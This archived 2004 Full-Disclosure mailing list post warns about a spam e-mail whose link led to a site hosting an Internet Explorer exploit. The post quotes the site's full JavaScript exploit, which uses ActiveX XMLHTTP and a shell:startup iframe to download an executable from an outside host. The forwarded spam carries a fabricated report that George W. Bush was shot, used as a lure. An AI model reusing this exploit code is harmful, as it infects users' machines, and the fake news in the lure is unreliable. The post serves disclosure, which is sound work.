GSO Full Disclosure Archives: [Full-Disclosure] Virus loading th

From: Martin Stricker <shugal@gmx.de>
Date: Tue Sep 07 2004 - 05:22:01 EDT

I just got attached e-mail. On the linked website I found this exploit
code (sorry for the line breaks):
<script>
function govuln(){
var w=window.open("javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open
("GET","http://real.slon.biz/server.exe",false);xmlHTTP.send();var
contents =
xmlHTTP.responseBody;document.innerHTML=("<title>You Need a
better browser</title><DIV ID=DS2 align=center
style=position:absolute;left:10;top:-30;><br><br><center><font
face=arial color=black><b>This web page requires Opera
Comptable browser</b>&nbspYou can download Opera from the
<a href=http://www.opera.com>Opera <frame src=log.php
name=frame1 scrolling=no frameborder=no noresize=noresize>Software
Group web
site</a>.</center></div><html><iframe
src=shell:startup HEIGHT=5000; WIDTH=5000
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-index:-90;></iframe><body
onload=showpop()><script>function
showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,screen.height+300);}</script><span
style=position: absolute; left: 1; top: 1
id=absspan></span><textarea id=txt rows=1 cols=20
style=display:none><html><body><table width=100%
height=100%><tr ALIGN=LEFT
VALIGN=TOP><br><center><img
src=http://real.slon.biz/server.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url(&quot;http://real.slon.biz/1.gif&quot;);></a></td></tr></table></textarea></body></html>")');window.close();}},100)","_blank","height=10,width=10,left=10000,top=10000");
w.location.assign=location.assign;
location.href="http://localhost";
}
govuln()
</script>

-- 
Homepage: http://www.martin-stricker.de/
Linux Migration Project: http://www.linux-migration.org/
Webmaster-Forum: http://www.masterportal24.com/cgi-bin/yindex.cgi
Red Hat Linux 9 for low memory: http://www.rule-project.org/
Registered Linux user #210635: http://counter.li.org/

attached mail follows:

duwyqfx tsuyxj ibnvk bmuf

George Bush sniper-rifle shot!

Today at 9 am the US president George W. Bush was shot by the sniper in the Hyde park. Bush's bodyguard killed.
lzqa scgaqq sppd pfwcdyk
Click here for the F.B.I comments

http://de.cnn.com

jyubi bhg zoemlfh wpmkwg

Scharfschutze-Gewehr von George Bush scho?!

Heute um 9 Uhr wurde der US-Prasident George W . Bush vom Scharfschutzen im Hyde Park geschossen. Der Leibwachter von Bush totete.
jhj llqiyfl xkem vetk
Klicken Sie hier fur die Kriminalpolizei-Anmerkungen

http://de.cnn.com

uay qdk bkolz medluk

qvajpdh golne ftqbitu ndsrs

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Received on Tue Sep 07 05:54:50 2004

This archive was generated by hypermail 2.1.8 : Tue Sep 07 2004 - 06:03:25 EDT

[Full-Disclosure] Virus loading through ActiveX-Exploit [Fwd: George Bush sniper-rifle shot!]